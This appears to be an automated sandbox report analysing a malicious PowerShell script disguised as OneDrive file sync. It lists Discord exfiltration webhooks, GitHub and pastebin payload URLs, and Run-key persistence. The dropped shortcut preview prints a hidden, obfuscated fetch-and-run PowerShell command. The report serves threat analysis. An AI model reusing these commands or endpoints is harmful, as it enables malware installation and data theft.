http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
discord.com
162.159.137.232
truetrue
    		unknown
    raw.githubusercontent.com
    		185.199.111.133
    		truetrue
      		unknown
      pastebin.com
      		172.67.19.24
      		truetrue
        		unknown

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        https://discord.com/api/webhooks/1284710807871033355/x0K3Voa94DlgTs4VQWHyks9bUB8i5Uipo6HRW6lKUeKFJpTODgkBqgFx7seLHmsLq996true
          		unknown
          http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txtfalse
            		unknown
            https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txtfalse
              		unknown
              https://discord.com/api/webhooks/1295751966227566694/ZDOwsWbEeGMPmjLUQsSudsSfhqvBoNBR93K3nrkS5aL7Ewva-6hqlEBSmLu1WVR5cEN5true
                		unknown
                http://pastebin.com/raw/sA04Mwk2false
                  		unknown
                  https://pastebin.com/raw/sA04Mwk2false
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://discord.com/api/webhooks/1295751966227566694/ZDOwsWbEeGMpowershell.exe, 0000000A.00000002.2357162809.00000198581C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2420329462.000002D1A08E4000.00000004.00000800.00020000.00000000.sdmptrue
                      		unknown
                      http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.2175097875.0000021C6EFF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2175097875.0000021C6F134000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://discord.compowershell.exe, 0000000A.00000002.2357162809.0000019858AFF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2420329462.000002D1A11C3000.00000004.00000800.00020000.00000000.sdmptrue
                        		unknown
                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.2150248824.0000021C5F1F9000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://crl.microsoftpowershell.exe, 0000000F.00000002.2476383382.000002D1B7EB1000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.2150248824.0000021C5F1F9000.00000004.00000800.00020000.00000000.sdmpfalse
                          		unknown
                          https://go.micropowershell.exe, 00000000.00000002.2150248824.0000021C6001D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2357162809.0000019857B48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2420329462.000002D1A021C000.00000004.00000800.00020000.00000000.sdmptrue
                          • URL Reputation: safe
                          		unknown
                          https://discord.com/api/webhooks/129575196622756powershell.exe, 0000000A.00000002.2357162809.0000019858AFF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2420329462.000002D1A11C3000.00000004.00000800.00020000.00000000.sdmptrue
                            		unknown
                            https://contoso.com/Licensepowershell.exe, 00000000.00000002.2175097875.0000021C6F134000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://contoso.com/Iconpowershell.exe, 00000000.00000002.2175097875.0000021C6F134000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.microsoft.cowpowershell.exe, 00000000.00000002.2179466916.0000021C770E0000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              http://discord.compowershell.exe, 00000000.00000002.2150248824.0000021C5F5F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2357162809.0000019858AFF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2420329462.000002D1A11C3000.00000004.00000800.00020000.00000000.sdmpfalse
                                		unknown
                                https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.2150248824.0000021C5F1F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		unknown
                                  http://c.zpowershell.exe, 00000000.00000002.2179609797.0000021C7722F000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://crl.mpowershell.exe, 00000000.00000002.2180083104.0000021C772BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://raw.githubusercontent.compowershell.exe, 0000000A.00000002.2357162809.000001985815E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2420329462.000002D1A083A000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://discord.com/api/webhooks/1295751966227566694/ZDOwsWbEeGMPmjLUQsSudsSfhqvBoNBR93K3nrkS5aL7Ewvpowershell.exe, 0000000F.00000002.2420329462.000002D1A08E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2420329462.000002D1A08C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2420329462.000002D1A07A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2420329462.000002D1A08BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2420329462.000002D1A08D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2420329462.000002D1A11C3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2420329462.000002D1A08DA000.00000004.00000800.00020000.00000000.sdmptrue
                                        		unknown
                                        https://contoso.com/powershell.exe, 00000000.00000002.2175097875.0000021C6F134000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.2175097875.0000021C6EFF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2175097875.0000021C6F134000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://raw.githubusercontent.compowershell.exe, 0000000A.00000002.2357162809.000001985815E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2357162809.000001985812F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2420329462.000002D1A081E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2420329462.000002D1A083A000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://discord.com/api/webhooks/1284710807871033355/x0K3Voa94DlgTs4VQWHyks9bUB8i5Uipo6HRW6lKUeKFJpTpowershell.exe, 00000000.00000002.2150248824.0000021C5F5F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2150248824.0000021C5F5F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2150248824.0000021C5F1A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2150248824.0000021C5F1F9000.00000004.00000800.00020000.00000000.sdmp, cr_asm2.ps1false
                                            		unknown
                                            https://aka.ms/pscore68powershell.exe, 00000000.00000002.2150248824.0000021C5EF81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2357162809.0000019857689000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2357162809.000001985769C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2420329462.000002D19FD51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2420329462.000002D19FD6E000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.2150248824.0000021C5EF81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2357162809.00000198576D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2420329462.000002D19FDA5000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://pastebin.compowershell.exe, 0000000A.00000002.2357162809.0000019858096000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2357162809.00000198580B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2357162809.0000019857B48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2420329462.000002D1A076E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2420329462.000002D1A0788000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2420329462.000002D1A021C000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://pastebin.compowershell.exe, 0000000A.00000002.2357162809.0000019858096000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2420329462.000002D1A0778000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/OneDriveFileSync.dllpowershell.exe, 00000000.00000002.2150248824.0000021C5F1A5000.00000004.00000800.00020000.00000000.sdmp, cr_asm2.ps1false
                                                  		unknown

                                                  World Map of Contacted IPs

                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs

                                                  Public IPs

                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  162.159.137.232
                                                  		discord.comUnited States
                                                  		13335CLOUDFLARENETUStrue
                                                  172.67.19.24
                                                  		pastebin.comUnited States
                                                  		13335CLOUDFLARENETUStrue
                                                  185.199.111.133
                                                  		raw.githubusercontent.comNetherlands
                                                  		54113FASTLYUStrue

                                                  General Information

                                                  Joe Sandbox version:41.0.0 Charoite
                                                  Analysis ID:1534235
                                                  Start date and time:2024-10-15 18:07:41 +02:00
                                                  Joe Sandbox product:CloudBasic
                                                  Overall analysis duration:0h 5m 55s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                  Number of analysed new started processes analysed:17
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Sample name:cr_asm2.ps1
                                                  Detection:MAL
                                                  Classification:mal88.troj.expl.evad.winPS1@20/21@3/3
                                                  EGA Information:
                                                  • Successful, ratio: 50%
                                                  HCA Information:
                                                  • Successful, ratio: 74%
                                                  • Number of executed functions: 19
                                                  • Number of non-executed functions: 0
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .ps1

                                                  Warnings

                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                  • Execution Graph export aborted for target powershell.exe, PID 6636 because it is empty
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                  • VT rate limit hit for: cr_asm2.ps1

                                                  Simulations

                                                  Behavior and APIs

                                                  TimeTypeDescription
                                                  12:08:39API Interceptor333x Sleep call for process: powershell.exe modified
                                                  17:09:06AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run OneDrive File Sync "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
                                                  17:09:15AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run OneDrive File Sync "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"

                                                  Joe Sandbox View / Context

                                                  IPs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  162.159.137.232gabe.ps1Get hashmaliciousUnknownBrowse
                                                    OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                                      BeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                                        gaber.ps1Get hashmaliciousUnknownBrowse
                                                          0CX5vBE7nr.exeGet hashmaliciousBabadeda, KDOT TOKEN GRABBERBrowse
                                                            SecuriteInfo.com.Trojan.PWS.Stealer.39881.18601.16388.exeGet hashmaliciousUnknownBrowse
                                                              WCA-Cooperative-Agreement.docx.exeGet hashmaliciousBabadeda, Exela Stealer, Python Stealer, Waltuhium GrabberBrowse
                                                                main.bat.bin.batGet hashmaliciousDiscord RatBrowse
                                                                  Bootstrapper V1.19.exeGet hashmaliciousPython Stealer, Empyrean, Discord Token StealerBrowse
                                                                    https://buxb0t.github.io/https-www.instagram.com-reel-CtFCB1_MvyH-Get hashmaliciousHTMLPhisherBrowse
                                                                      172.67.19.24VvPrGsGGWH.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                      • pastebin.com/raw/sA04Mwk2
                                                                      HQsitBLlOv.dllGet hashmaliciousUnknownBrowse
                                                                      • pastebin.com/raw/sA04Mwk2
                                                                      xK44OOt7vD.exeGet hashmaliciousUnknownBrowse
                                                                      • pastebin.com/raw/sA04Mwk2
                                                                      steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                                      • pastebin.com/raw/sA04Mwk2
                                                                      cr_asm_hiddenz.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                                      • pastebin.com/raw/sA04Mwk2
                                                                      BeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                                                      • pastebin.com/raw/sA04Mwk2
                                                                      cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                                      • pastebin.com/raw/sA04Mwk2
                                                                      steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                                      • pastebin.com/raw/sA04Mwk2
                                                                      cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                      • pastebin.com/raw/sA04Mwk2
                                                                      envifa.vbsGet hashmaliciousUnknownBrowse
                                                                      • pastebin.com/raw/V9y5Q5vv

                                                                      Domains

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      raw.githubusercontent.comgabe.ps1Get hashmaliciousUnknownBrowse
                                                                      • 185.199.109.133
                                                                      aidjBV.ps1Get hashmaliciousUnknownBrowse
                                                                      • 185.199.110.133
                                                                      cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                      • 185.199.108.133
                                                                      cr_asm_atCAD.ps1Get hashmaliciousUnknownBrowse
                                                                      • 185.199.110.133
                                                                      cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                                      • 185.199.111.133
                                                                      na.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                      • 185.199.109.133
                                                                      65567 DHL 647764656798860.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                      • 185.199.109.133
                                                                      Request for Order Confirmation.jsGet hashmaliciousUnknownBrowse
                                                                      • 185.199.110.133
                                                                      RrEf8Rui72.exeGet hashmaliciousUnknownBrowse
                                                                      • 185.199.109.133
                                                                      Untitled_15-10-04.xlsGet hashmaliciousRemcosBrowse
                                                                      • 185.199.108.133
                                                                      discord.comgabe.ps1Get hashmaliciousUnknownBrowse
                                                                      • 162.159.137.232
                                                                      aidjBV.ps1Get hashmaliciousUnknownBrowse
                                                                      • 162.159.135.232
                                                                      cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                      • 162.159.138.232
                                                                      cr_asm_atCAD.ps1Get hashmaliciousUnknownBrowse
                                                                      • 162.159.136.232
                                                                      cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                                      • 162.159.128.233
                                                                      vF20HtY4a4.exeGet hashmaliciousUnknownBrowse
                                                                      • 162.159.136.232
                                                                      vF20HtY4a4.exeGet hashmaliciousUnknownBrowse
                                                                      • 162.159.136.232
                                                                      VvPrGsGGWH.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                      • 162.159.138.232
                                                                      OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                                                      • 162.159.137.232
                                                                      5UIy3bo46y.dllGet hashmaliciousUnknownBrowse
                                                                      • 162.159.128.233
                                                                      pastebin.comgabe.ps1Get hashmaliciousUnknownBrowse
                                                                      • 104.20.3.235
                                                                      cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                      • 104.20.3.235
                                                                      cr_asm_atCAD.ps1Get hashmaliciousUnknownBrowse
                                                                      • 104.20.3.235
                                                                      cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                                      • 104.20.4.235
                                                                      vF20HtY4a4.exeGet hashmaliciousUnknownBrowse
                                                                      • 104.20.3.235
                                                                      vF20HtY4a4.exeGet hashmaliciousUnknownBrowse
                                                                      • 104.20.4.235
                                                                      VvPrGsGGWH.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                      • 172.67.19.24
                                                                      OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                                                      • 104.20.3.235
                                                                      5UIy3bo46y.dllGet hashmaliciousUnknownBrowse
                                                                      • 104.20.3.235
                                                                      HQsitBLlOv.dllGet hashmaliciousUnknownBrowse
                                                                      • 104.20.4.235

                                                                      ASNs

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      CLOUDFLARENETUSgabe.ps1Get hashmaliciousUnknownBrowse
                                                                      • 104.20.4.235
                                                                      aidjBV.ps1Get hashmaliciousUnknownBrowse
                                                                      • 162.159.135.232
                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                      • 104.21.53.8
                                                                      cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                      • 162.159.138.232
                                                                      cr_asm_atCAD.ps1Get hashmaliciousUnknownBrowse
                                                                      • 162.159.136.232
                                                                      cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                                      • 162.159.135.232
                                                                      cyCsE47YV3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      • 188.114.96.3
                                                                      na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      • 188.114.96.3
                                                                      RemotePCViewer.exeGet hashmaliciousUnknownBrowse
                                                                      • 172.67.37.123
                                                                      https://ghgeacb.r.bh.d.sendibt3.com/tr/cl/9i6x1nV2FKKN7vq8mr3OOEBBJCa885_P6VOZmrd6IAYZGxQqgx9-g2thnbfEyM7jcWMQq10DSkzoGE3hrRIOhqWmDMPB-v-Vs_HL2v8poWMBuT3diKJIsJCPnKr9QKNE7_LQcdnWzzdGVm3zkkF8zFTuvWpKy9uYId6Fqvw2hXfQsOcPQhS-r0DxYjl5NQ8-Qb21PAbLEM_Rbhi2eb4YBhrAe2x12cQGxRcawRCOj3pfpwGLu7SYcJdrZL0t9GyigTigzg3YlzmaeYqZCQsLc2qAheh9wzUxvwGet hashmaliciousUnknownBrowse
                                                                      • 188.114.96.3
                                                                      CLOUDFLARENETUSgabe.ps1Get hashmaliciousUnknownBrowse
                                                                      • 104.20.4.235
                                                                      aidjBV.ps1Get hashmaliciousUnknownBrowse
                                                                      • 162.159.135.232
                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                      • 104.21.53.8
                                                                      cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                      • 162.159.138.232
                                                                      cr_asm_atCAD.ps1Get hashmaliciousUnknownBrowse
                                                                      • 162.159.136.232
                                                                      cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                                      • 162.159.135.232
                                                                      cyCsE47YV3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      • 188.114.96.3
                                                                      na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      • 188.114.96.3
                                                                      RemotePCViewer.exeGet hashmaliciousUnknownBrowse
                                                                      • 172.67.37.123
                                                                      https://ghgeacb.r.bh.d.sendibt3.com/tr/cl/9i6x1nV2FKKN7vq8mr3OOEBBJCa885_P6VOZmrd6IAYZGxQqgx9-g2thnbfEyM7jcWMQq10DSkzoGE3hrRIOhqWmDMPB-v-Vs_HL2v8poWMBuT3diKJIsJCPnKr9QKNE7_LQcdnWzzdGVm3zkkF8zFTuvWpKy9uYId6Fqvw2hXfQsOcPQhS-r0DxYjl5NQ8-Qb21PAbLEM_Rbhi2eb4YBhrAe2x12cQGxRcawRCOj3pfpwGLu7SYcJdrZL0t9GyigTigzg3YlzmaeYqZCQsLc2qAheh9wzUxvwGet hashmaliciousUnknownBrowse
                                                                      • 188.114.96.3

                                                                      JA3 Fingerprints

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      3b5074b1b5d032e5620f69f9f700ff0egabe.ps1Get hashmaliciousUnknownBrowse
                                                                      • 162.159.137.232
                                                                      • 172.67.19.24
                                                                      • 185.199.111.133
                                                                      aidjBV.ps1Get hashmaliciousUnknownBrowse
                                                                      • 162.159.137.232
                                                                      • 172.67.19.24
                                                                      • 185.199.111.133
                                                                      cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                      • 162.159.137.232
                                                                      • 172.67.19.24
                                                                      • 185.199.111.133
                                                                      cr_asm_atCAD.ps1Get hashmaliciousUnknownBrowse
                                                                      • 162.159.137.232
                                                                      • 172.67.19.24
                                                                      • 185.199.111.133
                                                                      cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                                      • 162.159.137.232
                                                                      • 172.67.19.24
                                                                      • 185.199.111.133
                                                                      na.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                      • 162.159.137.232
                                                                      • 172.67.19.24
                                                                      • 185.199.111.133
                                                                      cyCsE47YV3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      • 162.159.137.232
                                                                      • 172.67.19.24
                                                                      • 185.199.111.133
                                                                      z7NLXIia8r.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                      • 162.159.137.232
                                                                      • 172.67.19.24
                                                                      • 185.199.111.133
                                                                      wbxZk3AvuB.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                      • 162.159.137.232
                                                                      • 172.67.19.24
                                                                      • 185.199.111.133
                                                                      3ckUhKW8W6.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                      • 162.159.137.232
                                                                      • 172.67.19.24
                                                                      • 185.199.111.133

                                                                      Dropped Files

                                                                      No context

                                                                      Created / dropped Files

                                                                      C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Archive, ctime=Sat May 7 04:20:03 2022, mtime=Mon Sep 9 22:58:05 2024, atime=Sat May 7 04:20:03 2022, length=69632, window=hidenormalshowminimized
                                                                      Category:dropped
                                                                      Size (bytes):1728
                                                                      Entropy (8bit):4.527272298423835
                                                                      Encrypted:false
                                                                      SSDEEP:24:8MBsCCbRKrzcAJBkr+/4MsPsiqxlD2uxmCnBuG4aVlilzXQaR3+hab/Ia7/OB+/q:8zD6JUUPx2uxFu+LozXv3KabINBY0
                                                                      MD5:724AA21828AD912CB466E3B0A79F478B
                                                                      SHA1:41B80A72CE8C2F1F54C1E595872D7ECD63D637CD
                                                                      SHA-256:D675147502CF2CA50BC4EC9A0D95DED0A5A8861BEC3D24FCD9EDD3F4B5718E70
                                                                      SHA-512:B88218356ABF805B4263B0960DC6D0FBEC47E2135FA74839449CA860F727D54A1014062C9E7DB0652E81C635C8C0C177B47326DADAF3AE34ED058FA085F1E98C
                                                                      Malicious:true
                                                                      Preview:L..................F.... ...|%h..a.........|%h..a..........................E....P.O. .:i.....+00.../C:\...................V.1......Y..0.Windows.@......T,*)Y................................W.i.n.d.o.w.s.....Z.1.....$Yh...System32..B......T,*)Y......L_.....................!.S.y.s.t.e.m.3.2.....f.2......T.* .forfiles.exe..J......T.*)Y.....A...........t..........t..f.o.r.f.i.l.e.s...e.x.e.......V...............4.......U...........`8......Windows.C:\Windows\System32\forfiles.exe..&.....\.....\.....\.W.i.n.d.o.w.s.\.S.y.s.t.e.m.3.2.\.f.o.r.f.i.l.e.s...e.x.e.../.p. .c.:.\.w.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2. ./.m. .n.o.t.e.p.a.d...e.x.e. ./.c. .".p.o.w.e.r.s.h.e.l.l...e.x.e. .-.c.o.m.m.a.n.d. .p.o.w.e.r.s.h.e.l.l. .-.w.i.n.d.o.w.s.t.y.l.e. .h. .-.c.o.m.m.a.n.d. .'.s.a.l. .f.a.t.b.a.k.e. .c.a.l.c.;.s.a.l. .c.a.l.l.i.t. .i.E.x.;. .s.a.l. .$.e.n.v.:.o.s. .i.W.r.;. .c.a.l.l.i.T.(.W.I.N.D.O.W.S._.N.T. .p.a.s.t.e.b.i.n...c.o.m./.r.a.w./.s.A.0.4.M.w.k.2. .-.u.s.e.b.a.s.i.c.p.a.r.s.i.n.g.).'."..

                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):11608
                                                                      Entropy (8bit):4.890472898059848
                                                                      Encrypted:false
                                                                      SSDEEP:192:39smG3YrKkDQp5SVsm5emln9smKp5FiMDOmEN3H+OHgFKxoeRH83YrKk7Vsm5emK:cEU/iQ0HzAFGLCib4Sib47VoGIpN6KQc
                                                                      MD5:66B287A82D897FD706FD1C8A5098E8A5
                                                                      SHA1:9C5962E1ECA4CFC2D5BC8BA4C6C737F77EC524F8
                                                                      SHA-256:5009DAAF58FD83E555547764CC1AE0F55B664B4A41AEF5EECB1963C7F6A0C413
                                                                      SHA-512:5A5713E9F6F1A32E7120838EA5CC4651D1ADA684685D11B6DDEF1CCBD4ED759DAD9D857C36FB2F9B4B6637BCC27ABC3C89BE9428C4CB117817D3F6468DD1DEBB
                                                                      Malicious:false
                                                                      Preview:PSMODULECACHE......x.g.z..I...C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psm1........SafeGetCommand........Get-ScriptBlockScope....$...Get-DictionaryValueFromFirstKeyFound........New-PesterOption........Invoke-Pester........ResolveTestScripts........Set-ScriptBlockScope........-Z..z..a...C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Unregister-PackageSource........Save-Package........Install-PackageProvider........Find-PackageProvider........Install-Package........Get-PackageProvider........Get-Package........Uninstall-Package........Set-PackageSource........Get-PackageSource........Find-Package........Register-PackageSource........Import-PackageProvider.........x.g.z..I...C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........AfterEa

                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):64
                                                                      Entropy (8bit):1.1940658735648508
                                                                      Encrypted:false
                                                                      SSDEEP:3:Nlllulm/Z:NllU
                                                                      MD5:022CA1CFCB1ED572D58EA006B628DA3D
                                                                      SHA1:657EA7E8B4E0AAC4EA74181FEE54BC7E2230F5F8
                                                                      SHA-256:67A07D890507E7F7BFD525D2B40C6946B9F74DF80EBBCB09681CF91310B3321F
                                                                      SHA-512:C5C88D30B1AFCC645367828F889CB0AF847F525D6FDD5ACA397F2C1FA0CDD7E07361171BA01B54785BCFFA86A3AF1D85B9EEDD19ACF4FFFEFDEE5FC17A84B702
                                                                      Malicious:false
                                                                      Preview:@...e...............................R..".............@..........

                                                                      C:\Users\user\AppData\Local\Temp\RES6B3F.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols, created Tue Oct 15 18:04:10 2024, 1st section name ".debug$S"
                                                                      Category:dropped
                                                                      Size (bytes):1332
                                                                      Entropy (8bit):4.006639228680141
                                                                      Encrypted:false
                                                                      SSDEEP:24:H4GFzW91+feFNKIsDfHOFwKEsmNwI+ycuZhNgl8akS5lRPNnqS2d:vosumKhmm1ulg8a37jqSG
                                                                      MD5:E4D87C5F980B2AE64956D2059B307F7E
                                                                      SHA1:1F5EF217C13EACAB0AF908B709C3596BEEB9C0C5
                                                                      SHA-256:7E5CD51DF15E389465CAE2A240E61EE98B225A609BB3BB64B891AC19708A855C
                                                                      SHA-512:13AD8BF5CC5EFD8AC5D5C5B57E99EA56077272176D5BE2A4DF88A6EC8816AAA4C599412385BEFA7A399269B9EF60D2C9CB11892D2F65936491D372E00A9FAD65
                                                                      Malicious:false
